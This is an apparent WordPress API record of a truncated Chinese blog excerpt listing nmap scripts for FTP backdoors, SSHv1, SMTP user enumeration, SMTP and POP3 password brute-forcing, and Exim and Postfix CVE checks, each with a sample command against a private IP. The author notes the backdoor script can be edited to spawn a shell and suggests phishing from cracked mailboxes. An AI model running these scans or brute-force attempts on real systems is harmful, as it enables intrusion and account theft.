\u88ab\u4eba\u63d2\u540e\u95e8[proftpd-1.3.3c.tar.bz2],\u7f3a\u7701\u53ea\u6267\u884cid\u547d\u4ee4,\u53ef\u81ea\u884c\u5230\u811a\u672c\u4e2d\u5b83\u6362\u6210\u80fd\u76f4\u63a5\u5f39shell\u7684\u547d\u4ee4 # nmap -p 21 &#8211;script ftp-vuln-cve2010-4221.nse -v 192.168.3.23 ftp-vsftpd-backdoor.nse VSFTPD v2.3.4 \u8ddfProftp\u540c\u6837\u7684\u95ee\u9898,\u88ab\u4eba\u6345\u8fdb\u53bb\u4ee5\u540e\u5728\u4ee3\u7801\u91cc\u9762\u63d2\u4e86\u540e\u95e8 # nmap -p 21 &#8211;script ftp-vsftpd-backdoor.nse -v 192.168.3.23 0\u00d703 \u548cssh \u76f8\u5173\u7684\u4e00\u4e9b\u626b\u63cf\u811a\u672c sshv1.nse \u5927\u5bb6\u90fd\u77e5\u9053\u7684,sshv1\u662f\u53ef\u4ee5\u88ab\u4e2d\u95f4\u4eba\u7684 # nmap -p 22 &#8211;script sshv1.nse -v 192.168.3.23 0\u00d704 \u548csmtp,pop3,imap\u76f8\u5173\u7684\u4e00\u4e9b\u626b\u63cf\u811a\u672c smtp-brute.nse \u7b80\u5355\u7206\u7834smtp\u5f31\u53e3\u4ee4,\u62ff\u8fd9\u4e2a\u7206\u8fdb\u53bb\u7684\u90ae\u7bb1\u7ed9\u4eba\u53d1\u4fe1\u4e5f\u8bb8\u6210\u529f\u7387\u4f1a\u7a0d\u5fae\u9ad8\u4e00\u70b9 # nmap -p 25 &#8211;script smtp-brute.nse -v 192.168.3.23 smtp-enum-users.nse \u679a\u4e3e\u76ee\u6807smtp\u670d\u52a1\u5668\u7684\u90ae\u4ef6\u7528\u6237\u540d,\u524d\u63d0\u662f\u76ee\u6807\u8981\u5b58\u5728\u6b64\u9519\u8bef\u914d\u7f6e\u624d\u884c,\u641c\u96c6\u4e00\u4e9b\u5fc5\u8981\u7684\u4fe1\u606f\u8fd8\u662f\u86ee\u597d\u7684 # nmap -p 25 &#8211;script smtp-enum-users.nse -v 192.168.3.23 smtp-vuln-cve2010-4344.nse Exim 4.70\u4e4b\u524d\u7248\u672c\u4e2d\u7684string.c\u6587\u4ef6\u4e2d\u7684string_vformat\u51fd\u6570\u4e2d\u5b58\u5728\u5806\u6ea2\u51fa # nmap -p 25 &#8211;script smtp-vuln-cve2010-4344.nse -v 192.168.3.23 smtp-vuln-cve2011-1720.nse Postfix 2.5.13\u4e4b\u524d\u7248\u672c\uff0c2.6.10\u4e4b\u524d\u76842.6.x\u7248\u672c\uff0c2.7.4\u4e4b\u524d\u76842.7.x\u7248\u672c\u548c2.8.3\u4e4b\u524d\u76842.8.x\u7248\u672c,\u5b58\u5728\u6ea2\u51fa # nmap -p 25 &#8211;script smtp-vuln-cve2011-1720.nse -v 192.168.3.23 smtp-vuln-cve2011-1764.nse Exim dkim_exim_verify_finish() \u5b58\u5728\u683c\u5f0f\u5b57\u7b26\u4e32\u6f0f\u6d1e,\u592a\u8001\u73b0\u5728\u57fa\u672c\u5f88\u96be\u9047\u5230\u4e86 # nmap -p 25 &#8211;script smtp-vuln-cve2011-1764.nse -v 192.168.3.23 pop3-brute.nse pop\u7b80\u5355\u5f31\u53e3\u4ee4\u7206\u7834 # nmap -p 110 &#8211;script pop3-brute.nse&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_eb_attr":"","footnotes":""},"categories":[95],"tags":[],"class_list":["post-1675","post","type-post","status-publish","format-standard","hentry","category-95"],"_links":{"self":[{"href":"https:\/\/oneai.eu.org\/index.php?rest_route=\/wp\/v2\/posts\/1675","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/oneai.eu.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/oneai.eu.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/oneai.eu.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/oneai.eu.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1675"}],"version-history":[{"count":1,"href":"https:\/\/oneai.eu.org\/index.php?rest_route=\/wp\/v2\/posts\/1675\/revisions"}],"predecessor-version":[{"id":1676,"href":"https:\/\/oneai.eu.org\/index.php?rest_route=\/wp\/v2\/posts\/1675\/revisions\/1676"}],"wp:attachment":[{"href":"https:\/\/oneai.eu.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1675"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/oneai.eu.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1675"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/oneai.eu.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1675"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}